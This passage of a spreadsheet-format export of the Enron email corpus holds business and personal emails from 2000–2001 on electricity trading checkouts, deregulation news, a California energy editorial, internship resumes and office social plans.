** Nominal personal income will increase by $1.4 billion, or 0.3%;_x000D_
** The price index will decrease by 0.47%; and,_x000D_
** The population will increase by 51,400 persons, or 0.4%, as workers move _x000D_
to the state._x000D_
"Pennsylvania's national leadership in electric competition continues to _x000D_
bring dramatic savings and economic benefits to Pennsylvanians," Ridge said. _x000D_
"And, according to this new report, those savings and benefits will continue _x000D_
for some time to come. We expect electric competition will help create more _x000D_
than 36,000 jobs between 1998 and 2004, and have a major positive impact on _x000D_
our state's economy. And millions of Pennsylvania families and employers _x000D_
continue to save money on their electric bills - without even lifting a _x000D_
finger."_x000D_
Savings from electric restructuring allow consumers more money to spend and _x000D_
invest, creating positive multiplier effects on the state economy, Secretary _x000D_
of Revenue Robert Judge said._x000D_
"Our research confirms that while consumers of electricity will realize rate _x000D_
reductions, there are many other benefits to Pennsylvania through electric _x000D_
competition," Judge said._x000D_
The Public Utility Commission estimates that consumers will save nearly $3 _x000D_
billion by January 2001 due to electric competition._x000D_
The report includes an analysis of the effects of restructuring on sales tax _x000D_
and personal income tax revenue. The 1996 restructuring law required that _x000D_
deregulation bring no net effect on "immediate" state tax collections, the _x000D_
report says. Under the law, the Revenue Department must report to governor _x000D_
and the General Assembly providing information on tax revenues to enable _x000D_
lawmakers to judge the law's impact on the economy and to decide whether new _x000D_
laws are necessary to "maintain tax revenue neutrality during the transition _x000D_
period."_x000D_
The revenue neutral reconciliation, the adjustment mechanism used to compare _x000D_
tax revenues collected before restructuring and after restructuring, is _x000D_
working as intended, the report says._x000D_
As required by the law, the Revenue Department will produce two more reports _x000D_
for the General Assembly and the Governor, one in August 2001 and one in _x000D_
August 2002._x000D_
Like Pennsylvania, some in Ontario say the movement toward a competitive _x000D_
market for electricity has saved customers upwards of $500 million through _x000D_
rate reductions._x000D_
Even though the Ontario Energy Board (OEB) is currently considering scaling _x000D_
back or stopping the move to competitive markets, one of the province's _x000D_
largest utilities, Toronto Hydro-Electric, says local regulators should _x000D_
recognize the savings from restructuring._x000D_
Toronto Hydro says the restructured market is successful because of the _x000D_
"utility's commitment to fair prices and safe reliable service in the new _x000D_
competitive electricity market." Since 1993, rates have fallen for all _x000D_
customer classes, the utility claims._x000D_
"We agree whole-heartedly with the need to protect consumers in the new _x000D_
electricity market," Toronto Hydro Vice President Blair Peberdy said. "As a _x000D_
municipal electric utility, we've protected consumers to the tune of more _x000D_
than $500 million through rate reduction strategies for the past seven years. _x000D_
Our rates are 12.5% below the consumer price index and we have reduced rates _x000D_
since 1993. That's why we're keen for the province to stay focused on _x000D_
introducing commercial reforms in the electricity distribution sector. We've _x000D_
invested millions in preparing for the opening of the new energy marketplace _x000D_
already and we're ready to go."_x000D_
The utility warned against further forced rate reductions in light of the _x000D_
savings they have produced. Toronto Hydro also called for regulators not to _x000D_
lower prices at the expense of more reliable service._x000D_
"Considering the rate freezes and reductions that Toronto Hydro has _x000D_
implemented since 1993, price minimization should not outweigh other _x000D_
objectives in the OEB act," the testimony says. "Protect consumers not just _x000D_
in terms of rates, but also in terms of the quality of electric distribution _x000D_
services."_x000D_
The company is also pushing for regulatory action to move along with _x000D_
competitive reform, not to delay the developing market already in a _x000D_
transition phase, because it might scare away new participants._x000D_
"The government has put a solid foundation in place for the new electricity _x000D_
market," Peberdy said. "Now is the time to look forward, not back. We're _x000D_
excited about the potential for new investment, new energy technologies and _x000D_
new business opportunities for Toronto Hydro, and we are prepared to work _x000D_
with the OEB to develop options that will help sustain the government's _x000D_
vision." _x000D_
_x000D_
Folder Name: Electric Restructuring _x000D_
Relevance Score on Scale of 100: 79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 Company, Inc. All Rights Reserved _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 02:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Counterparty Names</t>
  </si>
  <si>
    <t xml:space="preserve">The counterparty name saga continues...._x000D_
_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 02/27/2001 10:55 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
02/27/2001 10:43 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc: Monika Causholli/PDX/ECT@ECT _x000D_
_x000D_
Subject: Deal No. 532726_x000D_
_x000D_
As you know, we do not have a contract with Transalta Energy Marketing Corp. _x000D_
but with Transalta Energy Marketing (US) Inc.  I am changing this deal to _x000D_
that CP.  _x000D_
_x000D_
Let me know if you have any objections or if you prefer to make the change _x000D_
yourself.  Do you want me to continue to let you know of these changes?  I _x000D_
know Carla preferred to make the changes herself._x000D_
</t>
  </si>
  <si>
    <t>Fri, 31 Aug 2001 12:32:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bank (&amp; leave $ for housekeeper)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=MTAYLO1&gt;_x000D_
Date: Friday, August 31, 2001 7:32:34 GMT_x000D_
Subject: _x000D_
_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=MTAYLO1&gt;_x000D_
Date: Friday, August 31, 2001 7:32:34 GMT_x000D_
Subject: </t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 00:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 3/13 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">Yep - the strips are changed to reflect term 3/15 to 3/31. Glad that's _x000D_
finally solved!_x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/14/2001 07:01 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
_x000D_
Prebon agrees now because the confirm is exactly what we have, however, can _x000D_
you change both strips to reflect 3/15-3/31 in enpower (deal 549052)._x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/13/2001 05:45 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
We've changed this to a BOM deal (term 3/15 to 3/31), but Sean still _x000D_
recognizes this as an on-peak deal with a price of 241.00. Let me know if _x000D_
Prebon still disputes._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 03:24 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
_x000D_
yes- so this is what prebon is saying on this deal 549052:_x000D_
Enron buys from Pacificorp 25 mw of peak BOM Mid-C at $141.00_x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/13/2001 05:11 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
Sean Crandall said the price on this is correct (241), but he thought the _x000D_
deal was supposed to run through the end of the month. He was just walking _x000D_
into a meeting with Tim Belden while I was trying to figure this out with _x000D_
him, and he asked that I not change anything until he gets out and can look _x000D_
at it more closely. A price of $141 is awfully low for a peak deal flowing at _x000D_
Mid-C tomorrow - actually lower than the off-peak prices - so it sounds a _x000D_
little suspicious. I'll let you know when he gets out of the meeting._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 03:11 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
yes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/13/2001 05:02 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
549052 - del. point is already in as Mid-C, so just the price is wrong?_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 03:06 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
_x000D_
SORRY I gave you the incorrect deal number for this error.  Should be deal _x000D_
549052._x000D_
_x000D_
original error:_x000D_
Diana Scholtes_x000D_
deal 549053    549052_x000D_
Prebon shows price as $141 and delivery pt as Mid-C_x000D_
_x000D_
_x000D_
_x000D_
Diana Scholtes_x000D_
Prebon broker said our price (215) and del. point (Cob) are right_x000D_
_x000D_
S_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/13/2001 04:39 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/13 Checkout  _x000D_
_x000D_
Prebon_x000D_
Sean Crandall_x000D_
549048 - changed to NP_x000D_
_x000D_
Diana Scholtes_x000D_
Prebon broker said our price (215) and del. point (Cob) are right_x000D_
_x000D_
Jeff Richter_x000D_
549013 - changed to APB_x000D_
_x000D_
549010 - enron buys BP/Apr01/NP/peak/207.00 (in with Amerex - should it be _x000D_
Prebon?)_x000D_
_x000D_
Chris Mallory - just entered Williams deal_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 02:27 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 3/13 Checkout_x000D_
_x000D_
_x000D_
_x000D_
AMEREX_x000D_
All deals checked out fine_x000D_
_x000D_
_x000D_
_x000D_
PREBON_x000D_
_x000D_
Sean Crandall_x000D_
deal 549048_x000D_
Prebon shows del. point as NP-15 _x000D_
_x000D_
_x000D_
Diana Scholtes_x000D_
deal 549053_x000D_
Prebon shows price as $141 and delivery pt as Mid-C_x000D_
_x000D_
_x000D_
Jeff Richter_x000D_
deal 549013_x000D_
Prebon does not recognize_x000D_
_x000D_
I am missing the following:_x000D_
1) Enron buys from BP Energy 25 mw of April'01 NP-15 peak hrs at $207_x000D_
2) Enron buys Williams 25 mw of SP-15 of April'01 off-peak hrs at $107_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
BLOOMBERG_x000D_
All deals checked out fine._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 00:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Stanford OR - Summer Intern</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
Should we get him as well?_x000D_
It seems he has the right skills. _x000D_
We might have maxed out on the_x000D_
number of summer interns through_x000D_
the A/A program. We would have to_x000D_
hire him directly._x000D_
_x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/29/2000 _x000D_
08:20 AM ---------------------------_x000D_
_x000D_
_x000D_
"Shikhar Ranjan" &lt;shikhar@stanford.edu&gt; on 02/28/2000 02:31:39 PM_x000D_
To: Ravi_Thuraisingham@enron.net_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Fw: Stanford OR - Summer Intern_x000D_
_x000D_
_x000D_
_x000D_
Hi Ravi:_x000D_
_x000D_
I had sent an email about a week back with my resume for the summer_x000D_
internship. I think the address I sent it to was not correct, so I am_x000D_
resending it. I will also tell the others in the group to send there resumes_x000D_
to you. Thanks._x000D_
_x000D_
Regards,_x000D_
Shikhar_x000D_
------------------------_x000D_
Shikhar Ranjan_x000D_
PhD Student_x000D_
Management Science &amp; Engineering_x000D_
Stanford University CA_x000D_
(650) 497 5762_x000D_
_x000D_
----- Original Message -----_x000D_
From: Shikhar Ranjan &lt;shikhar@stanford.edu&gt;_x000D_
To: &lt;Ravi.Thuraisingham.Enron_Communications@enron.com&gt;_x000D_
Cc: &lt;Ravi.Thuraisingham@enron.com&gt;_x000D_
Sent: Sunday, February 20, 2000 5:24 PM_x000D_
Subject: Stanford OR - Summer Interns_x000D_
_x000D_
_x000D_
&gt; Hi Ravi:_x000D_
&gt;_x000D_
&gt; Please find attached my resume for the summer internship program. I_x000D_
&gt; apologize for the delay. We actually lost your contact info. Please let me_x000D_
&gt; know if you will need any additional information and/or a cover letter_x000D_
&gt; besides the resume and I can send it right away._x000D_
&gt;_x000D_
&gt; Thanks_x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt; Shikhar_x000D_
&gt; ------------------------_x000D_
&gt; Shikhar Ranjan_x000D_
&gt; PhD Student_x000D_
&gt; Management Science &amp; Engineering_x000D_
&gt; Stanford University CA_x000D_
&gt; (650) 497 5762_x000D_
&gt;_x000D_
_x000D_
 - Resume00-ENE.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 07:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ashleastu@aol.com'})</t>
  </si>
  <si>
    <t>Re: A Christmas Tasters</t>
  </si>
  <si>
    <t>It sounds great...we'll figure out a good time then.  I've really missed you _x000D_
guys these last few weeks.  I've been completely MIA.</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 03:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>You sound chipper anyway.   I'm actually bored today.  We haven't had any _x000D_
problems today.  I'm not used to that so I really know what to do with my _x000D_
time.  That and it's Friday and I don't really want to do anything.</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 11:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron and Blockbuster to Launch Entertainment On-Demand Service</t>
  </si>
  <si>
    <t xml:space="preserve">Today Enron Broadband Services announced a 20-year exclusive agreement with _x000D_
Blockbuster to deliver a revolutionary new "entertainment on demand" service _x000D_
to consumers.   Consumers will be able to order movies from the convenience _x000D_
of their homes, and watch them on their televisions whenever they want.  To _x000D_
learn more about this exciting announcement and view a webcast featuring _x000D_
interviews with Ken Lay and Blockbuster CEO John Antioco, visit _x000D_
http://www.ebentertainmentondemand.com/. </t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 14:26:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'carlos.sole@enron.com'})</t>
  </si>
  <si>
    <t>Termination/Suspension</t>
  </si>
  <si>
    <t>I see they've halted the sending of replies.  I will see if you should prepare them anyway to send tomorrow._x000D_
_x000D_
Here's the list of what we have so far.  I'll give you the letters and Debra is in charge of the files. It may be we don't have to look at every contract to get this done._x000D_
_x000D_
 _x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 09:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MD list with Policy Committee member</t>
  </si>
  <si>
    <t xml:space="preserve">Steve;_x000D_
David asked me to forward this to you, per your voice mail.  In addition, w=_x000D_
e=20_x000D_
will provide each Corporate Policy Committee rep with a list of those MD=01=_x000D_
,s=20_x000D_
they will be responsible for representing._x000D_
_x000D_
Please don=01,t hesitate to contact me should you have any additional quest=_x000D_
ions=20_x000D_
or concerns._x000D_
_x000D_
Gina_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 14 May 2001 10:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'fparra@swbanktx.com'})</t>
  </si>
  <si>
    <t>FW: Jeffrey Skilling Loan # 10386513</t>
  </si>
  <si>
    <t>these were the only things missing from this draw which we received today. _x000D_
-----Original Message----- _x000D_
From:?? Irene Hargy _x000D_
Sent:?? Wednesday, May 09, 2001 8:04 AM _x000D_
To:???? Fernando Parra _x000D_
Cc:???? Shelly Lambert _x000D_
Subject:??????? Jeffrey Skilling Loan # 10386513 _x000D_
_x000D_
Have received a draw request on the above and have ordered the inspection, _x000D_
however, we will need the following items prior to funding:_x000D_
_x000D_
Borrowers signature on the 3 page draw request _x000D_
Borrowers signature on the Contractors Disbursement Disclosure _x000D_
Borrowers signature on Change order #26 _x000D_
_x000D_
Please forward to my attention. _x000D_
_x000D_
Thanks! _x000D_
Irene Hargy Ext 21284 _x000D_
_x000D_
_x000D_
CONFIDENTIALITY NOTICE:_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
The information contained in this ELECTRONIC MAIL transmission_x000D_
is confidential.  It may also be privileged work product or proprietary_x000D_
information. This information is intended for the exclusive use of the_x000D_
addressee(s).  If you are not the intended recipient, you are hereby_x000D_
notified that any use, disclosure, dissemination, distribution [other_x000D_
than to the addressee(s)], copying or taking of any action because_x000D_
of this information is strictly prohibited._x000D_
_x000D_
************************************************************************</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 00:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@enron.com', 'gordon.savage@enron.com', 'erika.dupre@enron.com', 'kathy.bass@enron.com', 'richard.zdunkewicz@enron.com', 'angela.schwarz@enron.com', 'richard.sanders@enron.com', 'paul.kaufman@enron.com', 'jeremy.blachman@enron.com', 'harry.kingerski@enron.com', 'mark.muller@enron.com', 'tanya.leslie@enron.com', 'leticia.botello@enron.com', 'james.lewis@enron.com', 'james.wright@enron.com', 'greg.wolfe@enron.com', 'robert.williams@enron.com', 'jeff.messina@enron.com', 'sandra.mccubbin@enron.com', 'eric.melvin@enron.com', 'neil.hong@enron.com', 'jennifer.rudolph@enron.com', 'dorothy.youngblood@enron.com', 'triley@enron.com', 'frank.vickers@enron.com', 'harold.buchanan@enron.com', 'wgang@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.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craig.sutter@enron.com', 'christina.liscano@enron.com', 'fran.deltoro@enron.com', 'meredith.eggleston@enron.com', 'cathy.corbin@enron.com', 'vladimir.gorny@enron.com', 'ken.gustafson@enron.com', 'neil.bresnan@enron.com', 'skean@enron.com', 'iris.waser@enron.com', 'robert.badeer@enron.com', 'dennis.benevides@enron.com', 'richard.shapiro@enron.com', 'sharon.dick@enron.com', 'edward.sacks@enron.com', 'carol.moffett@enron.com', 'leasa.lopez@enron.com', 'debora.whitehead@enron.com', 'douglas.huth@enron.com', 'roger.yang@enron.com', 'dirk.vanulden@enron.com', 'christopher.calger@enron.com', 'james.steffes@enron.com', 'jubran.whalan@enron.com', 'evan.hughes@enron.com', 'jess.hewitt@enron.com', 'joe.hartsoe@enron.com', 'brenda.barreda@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>Sac Bee, Tues 2/13 Editorial: "Lawmakers failed to respond to_x000D_
 energy alarm"</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 02/15/2001 08:15 AM -----_x000D_
_x000D_
	Joseph Alamo_x000D_
	02/14/2001 11:50 AM_x000D_
		 _x000D_
		 To: Paul Kaufman/PDX/ECT@ECT, Susan J Mara/NA/Enron, Sandra _x000D_
McCubbin/NA/Enron, Jeff Dasovich/NA/Enron_x000D_
		 cc: Lysa Akin/PDX/ECT@ECT_x000D_
		 Subject: Sac Bee, Tues 2/13 Editorial: "Lawmakers failed to respond to _x000D_
energy alarm"_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Joseph Alamo/NA/Enron on 02/14/2001 09:48 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
	Joseph Alamo_x000D_
	02/13/2001 04:57 PM_x000D_
	_x000D_
To: Miyung Buster/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Sac Bee, Tues 2/13 Editorial: "Lawmakers failed to respond to energy _x000D_
alarm"_x000D_
_x000D_
_x000D_
Lawmakers failed to respond to energy alarm_x000D_
_x000D_
_x000D_
(Published Feb. 13, 2001) _x000D_
_x000D_
Now that state lawmakers have begun an inquiry to determine what caused _x000D_
California's energy crisis, they might want to take a look in the mirror. _x000D_
Not at the infamous 1996 vote that triggered the partial deregulation of the _x000D_
electricity industry. The remains of that law have been picked over enough. _x000D_
Besides, most of the people who voted for it have already left the _x000D_
Legislature, thanks to term limits. _x000D_
But there was another vote last June, far less heralded and still little _x000D_
known. It came just as warning bells were starting to signal the onset of _x000D_
what has since become a crippling crisis. The Legislature not only ignored _x000D_
those alarms, it stood in the way of the people who were trying to respond. _x000D_
Why it did so remains something of a mystery. How it did so says a lot about _x000D_
the way the Legislature works. _x000D_
At issue was the now-defunct California Power Exchange. This was a _x000D_
state-mandated auction, until recently the only place that utilities were _x000D_
allowed to shop for the electricity that lights our homes and businesses. By _x000D_
last June there were ominous signs that the power exchange, known as the PX, _x000D_
wasn't working right. Prices were higher than anyone expected. The supply of _x000D_
energy seemed thinner than was reasonable. There were enormous overhead _x000D_
costs. _x000D_
The power exchange was a bit like having a single automobile auction where _x000D_
everyone who wanted to buy or sell a car had to do business. In times of _x000D_
surplus this might work, because the sellers would underbid each other to _x000D_
unload their cars to reluctant buyers. But in a shortage, the opposite would _x000D_
be true. Buyers, with no place else to go, would pay ever-higher prices to _x000D_
get what they needed. That's what was happening with electricity. _x000D_
A majority of the Public Utilities Commission decided to do something about _x000D_
it. The PUC voted 3-2 to allow privately formed exchanges to compete with the _x000D_
state-sanctioned auction. At least two private exchanges were promising to _x000D_
deliver more power at lower prices with fewer administrative costs. The _x000D_
commission wanted to let them give it a try. _x000D_
But before the PUC could even implement the change, the Legislature _x000D_
intervened. Acting with unusual speed, lawmakers overturned the commission's _x000D_
decision. _x000D_
Assembly Bill 2866 was a classic legislative bill, in the worst sense. A _x000D_
cobbled-together collection of 28 unrelated items, it was drafted in a hurry _x000D_
as a companion to the new state budget. One of the bill's many parts was a _x000D_
provision to subsidize California's film industry. That got a lot of _x000D_
attention. The paragraph overturning the PUC's attempt to head off the energy _x000D_
crisis got next to none. The bill was amended in the Senate on June 15 and _x000D_
approved later that day. The Assembly passed it the next day, and Gov. Gray _x000D_
Davis signed it. _x000D_
The analysis of the bill that members saw in the Assembly was cryptic and _x000D_
misleading. It said the bill would authorize the PUC to study the idea of _x000D_
allowing competition for the state-mandated exchange. That was true as far as _x000D_
it went. But the analysis omitted the fact that the bill's real intent was _x000D_
just the opposite: to reverse a PUC decision and prohibit competing exchanges _x000D_
for at least a year. _x000D_
"California had made a big investment in the power exchange," said Sen. Jim _x000D_
Brulte, R-Rancho Cucamonga, who was one of probably just a handful of _x000D_
legislators who knew about the provision before it became law. "The PUC _x000D_
decision would have put that investment at risk." Which is another way of _x000D_
saying that the power exchange wasn't working and had to be protected from _x000D_
competition. _x000D_
Richard Bilas, the PUC commissioner who was pushing the hardest for the _x000D_
reform the Legislature overturned, said he never liked the idea of mandating _x000D_
a single exchange in which the utilities would have to buy all their power. _x000D_
Bilas wasn't a member of the commission when the PUC restructured _x000D_
California's electricity industry. But he said the result reminded him of the _x000D_
former Soviet Union, where leaders declared that they were going to move to a _x000D_
market economy and then appointed a group of central planners to figure out _x000D_
how those markets should function. _x000D_
"Markets are not based on fictitious or created exchanges," he said. "Markets _x000D_
are based on buyers and sellers coming face to face to negotiate a deal. You _x000D_
don't establish beforehand something that may not be necessary." _x000D_
It's still not clear whether opening up the markets would have prevented the _x000D_
price spikes that have since nearly bankrupted the utilities, forcing the _x000D_
state to step in and buy electricity to keep the lights on. It might be a _x000D_
stretch to suggest that any single policy change could have prevented the _x000D_
crisis. But we will never know. _x000D_
The Legislature, acting in haste and with little information, kept us from _x000D_
finding out. The California Power Exchange, which the Legislature was so _x000D_
eager to protect from competition, collapsed of its own weight anyway, and is _x000D_
now out of business. _x000D_
The law preventing other exchanges from entering the market was quietly _x000D_
repealed two weeks ago, seven very long months after it was adopted._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 02:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gary.lamphier@enron.com'})</t>
  </si>
  <si>
    <t>Paintball Tomorrow</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 01/26/2001 10:17 AM _x000D_
---------------------------_x000D_
Eric Bass   01/26/2001 10:12 AM_x000D_
_x000D_
To: Bryan Hull/HOU/ECT@ECT, Timothy Blanchard/HOU/EES@EES, Matthew _x000D_
Lenhart/HOU/ECT@ECT, Luis Mena/NA/Enron@Enron, Jason.Bass2@COMPAQ.com_x000D_
cc:  _x000D_
Subject: Paintball Tomorrow_x000D_
_x000D_
We are getting a group together to play paintaball tomorrow at around 10 am.  _x000D_
We will be playing at Adventure Village (just north of Intercontinental _x000D_
Airport on FM 1960).  Their website is www.adventurevillage.com.  The total _x000D_
cost should be somewhere between $30-$40 per person ( about $15 for a gun and _x000D_
$6 per 100 paintballs).  Let me know if you can make it._x000D_
_x000D_
_x000D_
-Eric_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 12:14:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Legal risk memos</t>
  </si>
  <si>
    <t>J:  Please add this to our spiral bound book.  Mark_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sharp, Vicki  _x000D_
Sent:	Monday, September 17, 2001 8:20 AM_x000D_
To:	Haedicke, Mark E._x000D_
Subject:	Legal risk memos_x000D_
_x000D_
 Attached is a first draft of the EES legal risk  matrix.  We will need to discuss what should go in the right columns._x000D_
_x000D_
---------------------- Forwarded by Vicki Sharp/HOU/EES on 09/12/2001 01:31 PM ---------------------------_x000D_
_x000D_
 	Enron Energy Services  From:  Kathy Dodgen                           09/12/2001 01:29 PM Phone No: 713 853-6077   EB890	_x000D_
		_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:	Vicki Sharp/HOU/EES@EES_x000D_
cc:	 _x000D_
Subject:	_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 02:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: faulk</t>
  </si>
  <si>
    <t xml:space="preserve">jj johnson has shown nothing in preseason where as lamar has been excellent , _x000D_
they were already talking about lamar being the starte before johnson got _x000D_
suspended._x000D_
_x000D_
if you don't like that is fine but it still doesn't change the fact that you _x000D_
have a shaky second rb and no backups that start let alone play._x000D_
_x000D_
so let me know_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Phillip M Love_x000D_
08/24/2000 09:23 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: faulk  _x000D_
_x000D_
Yeah, Lamar is solid for 4 weeks until JJ Johnson comes back.  Not interested._x000D_
PL_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 06:55:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Travel to Mexico City</t>
  </si>
  <si>
    <t xml:space="preserve">Agree completely,,,Best regards. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Tycholiz, Barry  _x000D_
Sent:	Monday, September 17, 2001 8:50 AM_x000D_
To:	Williams, Jaime_x000D_
Subject:	Travel to Mexico City_x000D_
_x000D_
Jaime, further to our conversations earlier. I look forward to our proposed meeting and will coordinate efforts with Stephanie Miller to prepare for ENA's discussion items.  I have decided for at least the next week or so to defer my travel plans ( I am not the best flyer at the best of times ).. As such, we should work towards the end of the month as a timeline for us to come down. _x000D_
_x000D_
We can nail down specific dates soonest. _x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Sat, 17 Jun 2000 18:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.smith@enron.com', 'bob.klein@enron.com', 'steve.venturatos@enron.com', 'michael.eiben@enron.com', 'martha.stevens@enron.com', 'sheila.glover@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com', 'susan.harrison@enron.com'})</t>
  </si>
  <si>
    <t>RESUME - Robert Goerner</t>
  </si>
  <si>
    <t xml:space="preserve">Following is the resume of Robert Goerner.  He is currently at Reliant doing _x000D_
pipeline accounting.  His salary is at $52K.  he was referred by Karen _x000D_
Lindley. _x000D_
_x000D_
    </t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/06/2001 _x000D_
02:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
02/06/2001 02:50 PM_x000D_
To: David Ikenberry &lt;daveike@rice.edu&gt; @ ENRON_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re:  _x000D_
_x000D_
Dave,_x000D_
_x000D_
Both days._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
David Ikenberry &lt;daveike@rice.edu&gt; on 02/06/2001 01:39:58 PM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc: ostdiek@rice.edu _x000D_
